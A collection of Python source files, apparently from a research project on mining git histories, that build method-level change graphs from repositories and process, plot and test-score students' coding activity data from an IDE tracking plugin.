if settings.get('traverse_min_date', required=False):
MIN_DATE = datetime.datetime.strptime(settings.get('traverse_min_date', required=False), '%d.%m.%Y') \
.replace(tzinfo=datetime.timezone.utc)
def __init__(self):
self._data_file_dir = os.path.join(self.GIT_REPOSITORIES_DIR, '.data.json')
self._data = {
'in_progress': [], # todo
'visited': []
}
self._load_data_file()
def _load_data_file(self):
with open(self._data_file_dir, 'a+') as f:
f.seek(0)
data = f.read()
if data:
try:
self._data = json.loads(data)
except:
logger.warning('Unable to load existing git repo data file')
def _save_data_file(self):
with open(self._data_file_dir, 'w+') as f:
json.dump(self._data, f, indent=4)
def build_change_graphs(self, parse_only_tests=False):
repo_names = [
name for name in os.listdir(self.GIT_REPOSITORIES_DIR)
if not name.startswith('_') and not name.startswith('.') and name not in self._data['visited']]
if not repo_names:
logger.warning('No available repositories were found')
return
logger.warning(f'Found {len(repo_names)} repositories, starting a build process')
if GitAnalyzer.TRAVERSE_ASYNC:
with multiprocessing.Pool(processes=multiprocessing.cpu_count(), maxtasksperchild=1000) as pool:
self._mine_changes(repo_names, pool=pool, parse_only_tests=parse_only_tests)
else:
self._mine_changes(repo_names, parse_only_tests=parse_only_tests)
def _mine_changes(self, repo_names, pool=None, parse_only_tests=False):
for repo_num, repo_name in enumerate(repo_names):
logger.warning(f'Looking at repo {repo_name} [{repo_num + 1}/{len(repo_names)}]')
self._data['visited'].append(repo_name)
self._save_data_file()
start = time.time()
commits = self._extract_commits(repo_name)
if pool and len(commits) > 0:
try:
pool.starmap(self._build_and_store_change_graphs, zip(commits, [parse_only_tests] * len(commits)))
except:
logger.error(f'Pool.map failed for repo {repo_name}', exc_info=True)
else:
for commit in commits:
self._build_and_store_change_graphs(commit, parse_only_tests)
logger.warning(f'Done building change graphs for repo={repo_name} [{repo_num + 1}/{len(repo_names)}]',
start_time=start)
def _extract_commits(self, repo_name):
start = time.time()
repo_path = os.path.join(self.GIT_REPOSITORIES_DIR, repo_name)
repo_url = self._get_repo_url(repo_path)
repo = RepositoryMining(repo_path, only_no_merge=True)
commits = []
for commit in repo.traverse_commits():
if not commit.parents:
continue
if self.MIN_DATE and commit.committer_date < self.MIN_DATE:
continue
cut = {
'author': {
'email': commit.author.email,
'name': commit.author.name
} if commit.author else None,
'num': len(commits) + 1,
'hash': commit.hash,
'dtm': commit.committer_date,
'msg': commit.msg,
'modifications': [],
'repo': {
'name': repo_name,
'path': repo_path,
'url': repo_url
}
}
for mod in commit.modifications:
cut['modifications'].append({
'type': mod.change_type,
'old_src': mod.source_code_before,
'old_path': mod.old_path,
'new_src': mod.source_code,
'new_path': mod.new_path
})
commits.append(cut)
logger.log(logger.WARNING, 'Commits extracted', start_time=start)
return commits
@staticmethod
def _get_repo_url(repo_path):
args = ['git', 'config', '--get', 'remote.origin.url']
result = subprocess.run(args, stdout=subprocess.PIPE, cwd=repo_path).stdout.decode('utf-8')
return result.strip()
@staticmethod
def _store_change_graphs(graphs):
pickled_graphs = []
for graph in graphs:
try:
pickled = pickle.dumps(graph, protocol=5)
pickled_graphs.append(pickled)
except RecursionError:
logger.error(f'Unable to pickle graph, file_path={graph.repo_info.old_method.file_path}, '
f'method={graph.repo_info.old_method.full_name}', exc_info=True)
filename = uuid.uuid4().hex
logger.info(f'Trying to store graphs to {filename}', show_pid=True)
with open(os.path.join(GitAnalyzer.STORAGE_DIR, f'{filename}.pickle'), 'w+b') as f:
pickle.dump(pickled_graphs, f)
logger.info(f'Storing graphs to {filename} finished', show_pid=True)
@staticmethod
def _build_and_store_change_graphs(commit, parse_only_tests=False):
change_graphs = []
commit_msg = commit['msg'].replace('\n', '; ')
logger.info(f'Looking at commit #{commit["hash"]}, msg: "{commit_msg}"', show_pid=True)
for mod in commit['modifications']:
if mod['type'] != ModificationType.MODIFY:
continue
if not all([mod['old_path'].endswith('.py'), mod['new_path'].endswith('.py')]):
continue
if parse_only_tests:
if mod['old_path'].find('test') == -1 and mod['new_path'].find('test') == -1:
continue
old_method_to_new = GitAnalyzer._get_methods_mapping(
GitAnalyzer._extract_methods(mod['old_path'], mod['old_src']),
GitAnalyzer._extract_methods(mod['new_path'], mod['new_src'])
)
for old_method, new_method in old_method_to_new.items():
old_method_src = old_method.get_source()
new_method_src = new_method.get_source()
if not all([old_method_src, new_method_src]) or old_method_src.strip() == new_method_src.strip():
continue
line_count = max(old_method_src.count('\n'), new_method_src.count('\n'))
if line_count > settings.get('traverse_file_max_line_count'):
logger.info(f'Ignored files due to line limit: {mod["old_path"]} -> {mod["new_src"]}')
continue
with tempfile.NamedTemporaryFile(mode='w+t', suffix='.py') as t1, \
tempfile.NamedTemporaryFile(mode='w+t', suffix='.py') as t2:
t1.writelines(old_method_src)
t1.seek(0)
t2.writelines(new_method_src)
t2.seek(0)
repo_info = RepoInfo(
commit['repo']['name'],
commit['repo']['path'],
commit['repo']['url'],
commit['hash'],
commit['dtm'],
mod['old_path'],
mod['new_path'],
old_method,
new_method,
author_email=commit['author']['email'] if commit.get('author') else None,
author_name=commit['author']['name'] if commit.get('author') else None
)
try:
cg = changegraph.build_from_files(
os.path.realpath(t1.name), os.path.realpath(t2.name), repo_info=repo_info)
except:
logger.log(logger.ERROR,
f'Unable to build a change graph for '
f'repo={commit["repo"]["path"]}, '
f'commit=#{commit["hash"]}, '
f'method={old_method.full_name}, '
f'line={old_method.ast.lineno}', exc_info=True, show_pid=True)
continue
change_graphs.append(cg)
if len(change_graphs) >= GitAnalyzer.STORE_INTERVAL:
GitAnalyzer._store_change_graphs(change_graphs)
change_graphs.clear()
if change_graphs:
GitAnalyzer._store_change_graphs(change_graphs)
change_graphs.clear()
@staticmethod
def _extract_methods(file_path, src):
try:
src_ast = ast.parse(src, mode='exec')
except:
logger.log(logger.INFO, 'Unable to compile src and extract methods', exc_info=True, show_pid=True)
return []
return ASTMethodExtractor(file_path, src).visit(src_ast)
@staticmethod
def _set_unique_names(methods):
method_name_to_cnt = {}
for method in methods:
cnt = method_name_to_cnt.setdefault(method.full_name, 0) + 1
method_name_to_cnt[method.full_name] = cnt
if cnt > 1:
method.full_name += f'#{cnt}'
@staticmethod
def _get_methods_mapping(old_methods, new_methods):
GitAnalyzer._set_unique_names(old_methods)
GitAnalyzer._set_unique_names(new_methods)
old_method_to_new = {}
for old_method in old_methods:
for new_method in new_methods:
if old_method.full_name == new_method.full_name:
old_method_to_new[old_method] = new_method
return old_method_to_new
class ASTMethodExtractor(ast.NodeVisitor):
def __init__(self, path, src):
self.file_path = path
self.src = src
def visit_Module(self, node):
methods = []
for st in node.body:
result = self.visit(st)
if result:
methods += result
return methods
def visit_ClassDef(self, node):
methods = []
for st in node.body:
result = self.visit(st)
if result:
methods += result
for method in methods:
method.extend_path(node.name)
return methods
def visit_FunctionDef(self, node):
return [Method(self.file_path, node.name, node, self.src)]
class Method:
def __init__(self, path, name, ast, src):
self.file_path = path
self.ast = ast
self.src = src.strip()
self.name = name
self.full_name = name
def extend_path(self, prefix, separator='.'):
self.full_name = f'{prefix}{separator}{self.full_name}'
# TODO: last = lines[end_lineno].encode()[:end_col_offset].decode(), IndexError: list index out of range
def get_source(self):
try:
return ast.get_source_segment(self.src, self.ast)
except:
logger.info(f'Unable to extract source segment from {self.ast}', show_pid=True)
return None
class RepoInfo:
def __init__(self, repo_name, repo_path, repo_url, commit_hash, commit_dtm,
old_file_path, new_file_path, old_method, new_method,
author_email=None, author_name=None):
self.repo_name = repo_name
self.repo_path = repo_path
self.repo_url = repo_url
self.commit_hash = commit_hash
self.commit_dtm = commit_dtm
self.old_file_path = old_file_path
self.new_file_path = new_file_path
self.old_method = old_method
self.new_method = new_method
self.author_email = author_email
self.author_name = author_name
```
|
{
"source": "JetBrains-Research/codetracker-data",
"score": 2
}
|
#### File: main/cli/processing.py
```python
import sys
import logging
sys.path.append('.')
from src.main.util import consts
from src.main.cli.util import ICli
from src.main.cli.configs import PROCESSING_LEVEL, PROCESSING_PARAMS
from src.main.util.log_util import configure_logger, add_console_stream
log = logging.getLogger(consts.LOGGER_NAME)
class PreprocessingCli(ICli):
def __init__(self):
super().__init__()
self._path = None
self._level = None
def configure_args(self) -> None:
self._parser.add_argument(PROCESSING_PARAMS.PATH.value, type=str, nargs=1, help='data path')
self._parser.add_argument(PROCESSING_PARAMS.LEVEL.value, nargs='?', const=3, default=3,
help=PROCESSING_LEVEL.description())
def parse_args(self) -> None:
args = self._parser.parse_args()
self._path = self.handle_path(args.path[0])
self._level = self.str_to_preprocessing_level(args.level)
def main(self) -> None:
self.parse_args()
path = self._path
for level_index in range(0, self._level.value + 1):
current_level = PROCESSING_LEVEL(level_index)
self._log.info(f'Current action is {current_level.level_handler()}')
path = current_level.level_handler()(path)
self._log.info(f'Folder with data: {path}')
print(f'Folder with data: {path}')
if __name__ == '__main__':
configure_logger(to_delete_previous_logs=True)
add_console_stream(log)
preprocessing_cli = PreprocessingCli()
preprocessing_cli.main()
```
#### File: src/main/main.py
```python
import sys
import logging
sys.path.append('.')
sys.path.append('../..')
from src.main.util import consts
from src.main.util.log_util import configure_logger, add_console_stream
log = logging.getLogger(consts.LOGGER_NAME)
def main() -> None:
configure_logger(to_delete_previous_logs=True)
add_console_stream(log)
if __name__ == '__main__':
main()
```
#### File: main/plots/profile_statistics_plots.py
```python
import logging
from typing import Dict, Any, List, Optional
import pandas as pd
import plotly.express as px
from src.main.util import consts
from src.main.util.consts import INT_EXPERIENCE, EXPERIENCE
from src.main.util.log_util import log_and_raise_error
from src.main.plots.util.plotly_util import save_plot, plot_and_save_freq_chart
from src.main.util.file_util import get_parent_folder, deserialize_data_from_file
from src.main.plots.util.plots_common import to_filter_rare_values, get_readable_key, get_labels_for_freq_plots
from src.main.plots.util.consts import PLOTTY_CATEGORY_ORDER, CHART_TYPE, STATISTICS_FREQ, STATISTICS_SHOWING_KEY, \
STATISTICS_KEY, STATISTICS_COLORS
log = logging.getLogger(consts.LOGGER_NAME)
def __read_statistics_from_file(path: str, default_value: consts.DEFAULT_VALUE, column: STATISTICS_KEY) -> Dict[str, Any]:
statistics_dict = deserialize_data_from_file(path)
readable_statistics_dict = {}
keys = statistics_dict.keys()
# Sort by my order
if column == STATISTICS_KEY.EXPERIENCE:
keys = __sort_experience_keys(keys)
for key in keys:
readable_statistics_dict[__get_readable_key_specific_by_column(key, default_value, column)] = statistics_dict[key]
return readable_statistics_dict
def __sort_experience_keys(keys: List[str]) -> List[str]:
experiences_keys = [x for x in EXPERIENCE.sorted_values() if x in keys]
experiences_keys += [x for x in keys if x not in experiences_keys]
return experiences_keys
def __get_readable_key_specific_by_column(key: str, default_value: consts.DEFAULT_VALUE, column: STATISTICS_KEY) -> str:
if column == STATISTICS_KEY.EXPERIENCE:
try:
return INT_EXPERIENCE[key].get_short_str()
except KeyError:
return get_readable_key(key, default_value)
return get_readable_key(key, default_value)
def __get_statistics_df_from_file(path: str, column: STATISTICS_KEY, default_value: consts.DEFAULT_VALUE,
to_union_rare: bool = False) -> pd.DataFrame:
statistics_dict = __read_statistics_from_file(path, default_value, column)
statistics_df = pd.DataFrame(statistics_dict.items(), columns=[column.value, STATISTICS_FREQ])
# If we want to union rare values
if to_union_rare:
to_filter_series = to_filter_rare_values(statistics_df)
statistics_df.loc[to_filter_series, column.value] \
= [STATISTICS_SHOWING_KEY.OTHERS.value] * to_filter_series.size
return statistics_df
def __get_title_for_plots(column: STATISTICS_KEY) -> str:
return get_readable_key(column.value) + ' distribution'
def __plot_pie_chart(statistics_df: pd.DataFrame, title: str, path: str, column: STATISTICS_KEY,
labels: Dict[str, str], plot_name: str = 'distribution_plot',
format: consts.EXTENSION = consts.EXTENSION.HTML, auto_open: bool = False) -> None:
fig = px.pie(statistics_df, values=STATISTICS_FREQ, names=column.value, title=title,
color_discrete_sequence=STATISTICS_COLORS.PIE_CHART.value,
hover_data=[STATISTICS_FREQ],
labels=labels)
fig.update_traces(textposition='inside', textinfo='percent')
save_plot(fig, path, CHART_TYPE.PIE, plot_name, format, auto_open)
# For more details see
# https://github.com/JetBrains-Research/task-tracker-post-processing/wiki/Visualization:-participants-distribution
def plot_profile_statistics(file: str, column: STATISTICS_KEY, plot_type: CHART_TYPE, to_union_rare: bool = False,
format: consts.EXTENSION = consts.EXTENSION.HTML, auto_open: bool = False,
x_category_order: PLOTTY_CATEGORY_ORDER = PLOTTY_CATEGORY_ORDER.TOTAL_ASCENDING,
x_axis_title: Optional[str] = None, y_axis_title: Optional[str] = None,
to_add_percents: bool = False, to_add_title: bool = True) -> None:
default_value = column.get_default()
statistics_df = __get_statistics_df_from_file(file, column, default_value, to_union_rare)
path = get_parent_folder(file)
labels = get_labels_for_freq_plots(column)
title = __get_title_for_plots(column) if to_add_title else None
if plot_type == CHART_TYPE.PIE:
__plot_pie_chart(statistics_df, title, path, column, labels, plot_name=column.value, format=format,
auto_open=auto_open)
elif plot_type == CHART_TYPE.BAR:
plot_and_save_freq_chart(statistics_df, title, path, column, labels, plot_name=column.value, format=format,
auto_open=auto_open, x_category_order=x_category_order, x_axis_title=x_axis_title,
y_axis_title=y_axis_title, to_add_percents=to_add_percents)
else:
log_and_raise_error(f'Plot type {plot_type} is incorrect!', log)
```
#### File: main/plots/scoring_solutions_plots.py
```python
from typing import List, Union, Tuple
import pandas as pd
from src.main.util import consts
from src.main.task_scoring.task_scoring import unpack_tests_results
from src.main.util.file_util import get_parent_folder, get_name_from_path
from src.main.util.consts import ISO_ENCODING, TASK_TRACKER_COLUMN, TEST_RESULT, TASK
from src.main.plots.util.graph_representation_util import get_color_by_rate, get_graph_representation, create_dot_graph
TESTS_RESULTS = consts.TASK_TRACKER_COLUMN.TESTS_RESULTS.value
FILE_NAME = consts.TASK_TRACKER_COLUMN.FILE_NAME.value
def __find_next_score_index(scores: List[float], start_index: int = 0) -> int:
for i in range(start_index, len(scores)):
if scores[i] != scores[start_index]:
return i
return len(scores)
def __get_label_for_score(id: int, label: Union[str, int], score: float) -> str:
return f'{id} [label="{label}", style=filled, fillcolor={get_color_by_rate(score)}]\n'
def __get_edge(src_id: int, dst_id: int) -> str:
return f'{src_id} -> {dst_id}\n'
def get_labels_and_graph_structure(scores: List[float]) -> Tuple[str, str]:
labels = ''
structure = ''
i = 0
while i < len(scores):
next_score_index = __find_next_score_index(scores, i)
# Collapse long chains of vertices with the same score
# Add the current vertex
labels += __get_label_for_score(i + 1, i + 1, scores[i])
# If the current vertex is not the first, add en edge with the previous one
if i != 0:
structure += __get_edge(i, i + 1)
# If we need to add an intermediate vertex
if i < next_score_index - 2:
# Add an intermediate vertex
labels += __get_label_for_score(i + 2, '...', scores[i])
structure += __get_edge(i + 1, i + 2)
labels += __get_label_for_score(next_score_index, next_score_index, scores[i])
structure += __get_edge(i + 2, next_score_index)
i = next_score_index - 1
i += 1
return labels, structure
def __is_incorrect_fragment(tests_results: str) -> bool:
return TEST_RESULT.INCORRECT_CODE.value in unpack_tests_results(tests_results, TASK.tasks())
def calculate_current_task_rate(df: pd.DataFrame) -> pd.DataFrame:
file_name = df[FILE_NAME].unique()[0]
current_task = TASK(get_name_from_path(file_name, False))
return df[TESTS_RESULTS].apply(lambda x: unpack_tests_results(x, TASK.tasks())[TASK.tasks().index(current_task)])
# For more details see
# https://github.com/JetBrains-Research/task-tracker-post-processing/wiki/Visualization:-scoring-solutions-plots
def plot_scoring_solutions(tt_file_path: str, name_prefix: str = 'scoring_solution') -> str:
ct_df = pd.read_csv(tt_file_path, encoding=ISO_ENCODING)
# Delete incorrect fragments
correct_df = ct_df[ct_df.apply(lambda row: not __is_incorrect_fragment(row[TESTS_RESULTS]), axis=1)]
correct_df[TESTS_RESULTS] = calculate_current_task_rate(correct_df)
scores = correct_df[TASK_TRACKER_COLUMN.TESTS_RESULTS.value].values
labels, graph_structure = get_labels_and_graph_structure(scores)
solutions_representation = get_graph_representation(labels, graph_structure)
output_path = get_parent_folder(tt_file_path)
output_path = create_dot_graph(output_path,
f'{get_name_from_path(tt_file_path, False)}_{name_prefix}',
solutions_representation)
return output_path
```
#### File: main/processing/activity_tracker_handler.py
```python
import logging
import datetime
from typing import Dict, List, Any, Tuple
import pandas as pd
from src.main.util import consts
from src.main.util.log_util import log_and_raise_error
from src.main.util.time_util import get_datetime_by_format
from src.main.util.language_util import get_extension_by_language
from src.main.util.file_util import get_name_from_path, get_original_file_name_with_extension
log = logging.getLogger(consts.LOGGER_NAME)
# Unification of similar activity tracker events. For example, an action Run by pressed the button Run and by
# pressing a combination of buttons is not similar in the source data. After the unification, the function returns a
# new activity tracker data with the union this kind of events
def __unify_activity_tracker_columns(ati_data: pd.DataFrame) -> pd.DataFrame:
action_events = consts.ACTIVITY_TRACKER_EVENTS.action_events()
for index in range(ati_data.shape[0]):
current_focused_component = ati_data[consts.ACTIVITY_TRACKER_COLUMN.FOCUSED_COMPONENT.value].iloc[index]
if current_focused_component in action_events:
ati_data[consts.ACTIVITY_TRACKER_COLUMN.EVENT_DATA.value].iloc[index] \
= ati_data[consts.ACTIVITY_TRACKER_COLUMN.FOCUSED_COMPONENT.value].iloc[index]
ati_data[consts.ACTIVITY_TRACKER_COLUMN.EVENT_TYPE.value].iloc[index] \
= consts.ACTIVITY_TRACKER_EVENTS.ACTION.value
return ati_data
# Filtering the activity-tracker data: returns a new activity-tracker data with deleted not necessary events
# Necessary events can be seen in the const file: ACTIVITY_TRACKER_EVENTS and ACTION_EVENTS
def __filter_ati_data(ati_data: pd.DataFrame) -> pd.DataFrame:
event_types = [consts.ACTIVITY_TRACKER_EVENTS.ACTION.value,
consts.ACTIVITY_TRACKER_EVENTS.COMPILATION_FINISHED.value]
action_events = consts.ACTIVITY_TRACKER_EVENTS.action_events()
ati_data = ati_data[(ati_data[consts.ACTIVITY_TRACKER_COLUMN.EVENT_TYPE.value].isin(event_types))
& (ati_data[consts.ACTIVITY_TRACKER_COLUMN.EVENT_DATA.value].isin(action_events))]
ati_data.index = [*range(ati_data.shape[0])]
return ati_data
def __get_default_dict_for_at() -> Dict[str, List[Any]]:
return {
consts.ACTIVITY_TRACKER_COLUMN.TIMESTAMP_ATI.value: [],
consts.ACTIVITY_TRACKER_COLUMN.EVENT_TYPE.value: [],
consts.ACTIVITY_TRACKER_COLUMN.EVENT_DATA.value: []
}
def __add_values_in_ati_dict(ati_dict: Dict[str, List[Any]], timestamp: str = '', event_type: str = '',
event_data: str = '') -> None:
ati_dict[consts.ACTIVITY_TRACKER_COLUMN.TIMESTAMP_ATI.value].append(timestamp)
ati_dict[consts.ACTIVITY_TRACKER_COLUMN.EVENT_TYPE.value].append(event_type)
ati_dict[consts.ACTIVITY_TRACKER_COLUMN.EVENT_DATA.value].append(event_data)
def __add_values_in_ati_dict_by_ati_index(res_dict: Dict[str, List[Any]], activity_tracker_data: pd.DataFrame,
index: int) -> None:
__add_values_in_ati_dict(res_dict,
activity_tracker_data[consts.ACTIVITY_TRACKER_COLUMN.TIMESTAMP_ATI.value].iloc[index],
activity_tracker_data[consts.ACTIVITY_TRACKER_COLUMN.EVENT_TYPE.value].iloc[index],
activity_tracker_data[consts.ACTIVITY_TRACKER_COLUMN.EVENT_DATA.value].iloc[index])
def __are_same_files(code_tracker_file_name: str, activity_tracker_file_path: str) -> bool:
if pd.isnull(activity_tracker_file_path):
return False
try:
activity_tracker_file_name = get_name_from_path(activity_tracker_file_path)
except ValueError:
# If the activity_tracker_file_name has an invalid extension, it does not equal code_tracker_file_name
return False
return code_tracker_file_name == activity_tracker_file_name
# Insert a row to the dataframe before the row_number position.
# For example, we have the dataset with 1 column and 3 rows: A C D
# If we have row_number = 1 and row_value = B, the function returns the dataset with rows: A B C D
def __insert_row(df: pd.DataFrame, row_number: int, row_value: list) -> pd.DataFrame:
if row_number > df.index.max() + 1:
log_and_raise_error('Invalid row_number in the method __insert_row', log)
df1 = df[0:row_number]
df2 = df[row_number:]
df1.loc[row_number] = row_value
df_result = pd.concat([df1, df2])
df_result.index = [*range(df_result.shape[0])]
return df_result
def preprocess_activity_tracker_data(activity_tracker_data: pd.DataFrame,
to_filter_ati_data: bool = True) -> pd.DataFrame:
log.info('...starting to unify activity tracker data')
activity_tracker_data = __unify_activity_tracker_columns(activity_tracker_data)
log.info('finish unifying activity tracker data')
if to_filter_ati_data:
log.info('...starting to filter activity tracker data')
activity_tracker_data = __filter_ati_data(activity_tracker_data)
log.info('finish filtering activity tracker data')
return activity_tracker_data
def __create_joined_code_tracker_data_frame(code_tracker_data: pd.DataFrame,
res: Dict[str, List[Any]]) -> pd.DataFrame:
ati_df = pd.DataFrame(res)
return code_tracker_data.join(ati_df)
def get_full_default_columns_for_at(count_rows: int) -> Dict[str, List[Any]]:
res = __get_default_dict_for_at()
for i in range(count_rows):
__add_values_in_ati_dict(res)
return res
# Get size of result for activity tracker data
def __get_dict_lists_size(res: Dict[str, List[Any]]) -> int:
size = 0
for key in res.keys():
if size != 0 and len(res[key]) != size:
log_and_raise_error('Lists in the res dict have different sizes', log)
size = len(res[key])
return size
def is_last(index: int, data: pd.DataFrame) -> bool:
return index == data.shape[0] - 1
def is_next_ct_valid(ati_time: datetime, cur_ct_i: int, code_tracker_data: pd.DataFrame) -> bool:
next_ct_time = get_datetime_by_format(code_tracker_data[consts.TASK_TRACKER_COLUMN.DATE.value].iloc[cur_ct_i + 1])
return (ati_time - next_ct_time).total_seconds() >= 0
def is_ct_i_filled(ct_i: int, ati_dict: Dict[str, List[Any]]) -> bool:
return __get_dict_lists_size(ati_dict) > ct_i
def merge_task_tracker_and_activity_tracker_data(code_tracker_data: pd.DataFrame,
activity_tracker_data: pd.DataFrame) -> pd.DataFrame:
log.info('Start merging code tracker and activity tracker data')
res = __get_default_dict_for_at()
ct_file_name = code_tracker_data[consts.TASK_TRACKER_COLUMN.FILE_NAME.value].iloc[0]
ct_i = 0
for ati_i in range(activity_tracker_data.shape[0]):
activity_tracker_file_path = activity_tracker_data[consts.ACTIVITY_TRACKER_COLUMN.CURRENT_FILE.value].iloc[
ati_i]
if not __are_same_files(ct_file_name, activity_tracker_file_path):
continue
ati_time = get_datetime_by_format(
activity_tracker_data[consts.ACTIVITY_TRACKER_COLUMN.TIMESTAMP_ATI.value].iloc[ati_i])
while not is_last(ct_i, code_tracker_data) and is_next_ct_valid(ati_time, ct_i, code_tracker_data):
if not is_ct_i_filled(ct_i, res):
__add_values_in_ati_dict(res)
ct_i += 1
if is_ct_i_filled(ct_i, res):
ct_row = list(code_tracker_data.iloc[ct_i])
code_tracker_data = __insert_row(code_tracker_data, ct_i + 1, ct_row)
ct_i += 1
__add_values_in_ati_dict_by_ati_index(res, activity_tracker_data, ati_i)
log.info('Finish handling the activity tracker file')
times = code_tracker_data.shape[0] - __get_dict_lists_size(res)
while times > 0:
__add_values_in_ati_dict(res)
times -= 1
log.info('Finish setting empty values for the last code tracker items')
code_tracker_data = __create_joined_code_tracker_data_frame(code_tracker_data, res)
log.info('Finish merging code tracker and activity tracker data')
return code_tracker_data
def __remove_nan(items: List[Any]) -> List[Any]:
return list(filter(lambda x: not pd.isnull(x), items))
def get_files_from_ati(activity_tracker_data: pd.DataFrame) -> List[str]:
"""
Get all the filenames that were tracked by the activity tracker plugin.
"""
return __remove_nan(activity_tracker_data[consts.ACTIVITY_TRACKER_COLUMN.CURRENT_FILE.value].unique())
def get_tt_name_from_ati_data(ct_file: str, language: consts.LANGUAGE, files_from_at: List[str]) -> Tuple[str, bool]:
"""
Try to find the current name of the code tracker file among those tracked by the activity tracker plugin.
"""
log.info('Start getting project file name')
extension = get_extension_by_language(language)
hashed_file_name = get_name_from_path(ct_file)
file_name = get_original_file_name_with_extension(hashed_file_name, extension)
does_contain_name = True
if files_from_at is not None:
log.info(f'Start searching the file_name {file_name} in activity tracker data')
if file_name not in files_from_at:
log.info(f'Activity tracker data does not contain the original file {file_name}')
does_contain_name = False
log.info(f'Finish searching the file_name {file_name} in activity tracker data')
log.info('Finish getting project file name')
return file_name, does_contain_name
def handle_ati_file(ati_file: str, to_filter_ati_data: bool = True) -> pd.DataFrame:
ati_df = None
if ati_file:
ati_df = pd.read_csv(ati_file, encoding=consts.ISO_ENCODING,
names=consts.ACTIVITY_TRACKER_COLUMN.activity_tracker_columns())
ati_df = preprocess_activity_tracker_data(ati_df, to_filter_ati_data)
return ati_df
```
#### File: main/task_scoring/java_task_checker.py
```python
import logging
from typing import List
import javalang
from javalang.tokenizer import LexerError
from javalang.parser import JavaSyntaxError, JavaParserError
from src.main.util import consts
from src.main.util.consts import LANGUAGE
from src.main.util.file_util import get_name_from_path
from src.main.task_scoring.task_checker import ITaskChecker, check_call_safely, check_output_safely, SOURCE_OBJECT_NAME, \
SOURCE_FOLDER
log = logging.getLogger(consts.LOGGER_NAME)
class JavaTaskChecker(ITaskChecker):
def __init__(self):
self.package = ''
@property
def language(self) -> LANGUAGE:
return LANGUAGE.JAVA
# class A{
# public static void main(String args[]){
# Scanner in=new Scanner(System.in);
# Int a=in.nextInt();
# System.out.print(a);}}
@property
def min_symbols_number(self) -> int:
return 140
@property
def output_strings(self) -> List[str]:
return ['System.out.print']
# https://github.com/c2nes/javalang
def get_java_class_name(self, source_code: str) -> str:
try:
tree = javalang.parse.parse(source_code)
name = next(clazz.name for clazz in tree.types
if isinstance(clazz, javalang.tree.ClassDeclaration)
for m in clazz.methods
if m.name == 'main' and m.modifiers.issuperset({'public', 'static'}))
if tree.package:
log.info(f'Java source code package is {tree.package.name}')
self.package = tree.package.name + '.'
return name
except (JavaSyntaxError, JavaParserError, LexerError) as e:
log.info('Java lexer/parser exception was raised')
log.exception(e)
return SOURCE_OBJECT_NAME
except Exception as e:
log.exception(e)
return SOURCE_OBJECT_NAME
def create_source_file(self, source_code: str) -> str:
source_file_name = self.get_java_class_name(source_code)
return self.create_source_file_with_name(source_code, source_file_name)
def is_source_file_correct(self, source_file: str) -> bool:
args = ['javac', source_file, '-d', SOURCE_FOLDER]
is_correct = check_call_safely(args, None)
log.info(f'Source code is correct: {is_correct}')
return is_correct
def run_test(self, input: str, expected_output: str, source_file: str) -> bool:
args = ['java', '-cp', SOURCE_FOLDER, self.package + get_name_from_path(source_file, False)]
return check_output_safely(input, expected_output, args)
```
#### File: main/task_scoring/tasks_tests_handler.py
```python
import os
import logging
from typing import List, Tuple, Optional
import pandas as pd
from src.main.util import consts
from src.main.util.consts import LANGUAGE, TASK
from src.main.util.log_util import log_and_raise_error
from src.main.task_scoring.cpp_task_checker import CppTaskChecker
from src.main.task_scoring.java_task_checker import JavaTaskChecker
from src.main.processing.task_tracker_handler import get_tt_language
from src.main.task_scoring.kotlin_task_checker import KotlinTaskChecker
from src.main.task_scoring.python_task_checker import PythonTaskChecker
from src.main.task_scoring.task_checker import TASKS_TESTS_PATH, FilesDict
from src.main.task_scoring.undefined_task_checker import UndefinedTaskChecker
from src.main.util.file_util import get_all_file_system_items, tt_file_condition, get_output_directory, \
write_based_on_language, get_file_and_parent_folder_names, pair_in_and_out_files, match_condition, \
get_name_from_path, get_parent_folder, get_parent_folder_name
log = logging.getLogger(consts.LOGGER_NAME)
FRAGMENT = consts.TASK_TRACKER_COLUMN.FRAGMENT.value
TESTS_RESULTS = consts.TASK_TRACKER_COLUMN.TESTS_RESULTS.value
def create_in_and_out_dict(tasks: List[TASK]) -> FilesDict:
in_and_out_files_dict = {}
for task in tasks:
root = os.path.join(TASKS_TESTS_PATH, task.value)
in_files = get_all_file_system_items(root, match_condition(r'in_\d+.txt'))
out_files = get_all_file_system_items(root, match_condition(r'out_\d+.txt'))
if len(out_files) != len(in_files):
log_and_raise_error('Length of out files list does not equal in files list', log)
in_and_out_files_dict[task] = pair_in_and_out_files(in_files, out_files)
return in_and_out_files_dict
def check_tasks(tasks: List[TASK], source_code: str, in_and_out_files_dict: FilesDict,
language: LANGUAGE = LANGUAGE.PYTHON, stop_after_first_false: bool = True,
current_task: Optional[TASK] = None) -> List[float]:
if language == LANGUAGE.PYTHON:
task_checker = PythonTaskChecker()
elif language == LANGUAGE.JAVA:
task_checker = JavaTaskChecker()
elif language == LANGUAGE.CPP:
task_checker = CppTaskChecker()
elif language == LANGUAGE.KOTLIN:
task_checker = KotlinTaskChecker()
else:
task_checker = UndefinedTaskChecker()
return task_checker.check_tasks(tasks, source_code, in_and_out_files_dict, stop_after_first_false,
current_task=current_task)
def __check_tasks_on_correct_fragments(data: pd.DataFrame, tasks: List[TASK], in_and_out_files_dict: FilesDict,
file_log_info: str = '',
current_task: Optional[TASK] = None) -> Tuple[LANGUAGE, pd.DataFrame]:
data[FRAGMENT] = data[FRAGMENT].fillna('')
# If run after processing, this value can be taken from 'language' column
language = get_tt_language(data)
log.info(f'{file_log_info}, language is {language.value}, found {str(data.shape[0])} fragments')
if language == consts.LANGUAGE.UNDEFINED:
data[TESTS_RESULTS] = str([consts.TEST_RESULT.LANGUAGE_UNDEFINED.value] * len(tasks))
else:
unique_fragments = list(data[FRAGMENT].unique())
log.info(f'Found {str(len(unique_fragments))} unique fragments')
fragment_to_test_results_dict = dict(
map(lambda f:
(f, check_tasks(tasks, f, in_and_out_files_dict, language, current_task=current_task)),
unique_fragments))
data[TESTS_RESULTS] = data.apply(lambda row: fragment_to_test_results_dict[row[FRAGMENT]], axis=1)
return language, data
def filter_already_tested_files(files: List[str], output_directory_path: str) -> List[str]:
tested_files = get_all_file_system_items(output_directory_path, tt_file_condition)
tested_folder_and_file_names = list(map(lambda f: get_file_and_parent_folder_names(f), tested_files))
return list(filter(lambda f: get_file_and_parent_folder_names(f) not in tested_folder_and_file_names, files))
def __get_task_by_ct_file(file: str) -> Optional[TASK]:
task_key = get_name_from_path(get_parent_folder(file), with_extension=False)
try:
return TASK(task_key)
except ValueError:
log.info(f'Unexpected task for the file {file}')
return None
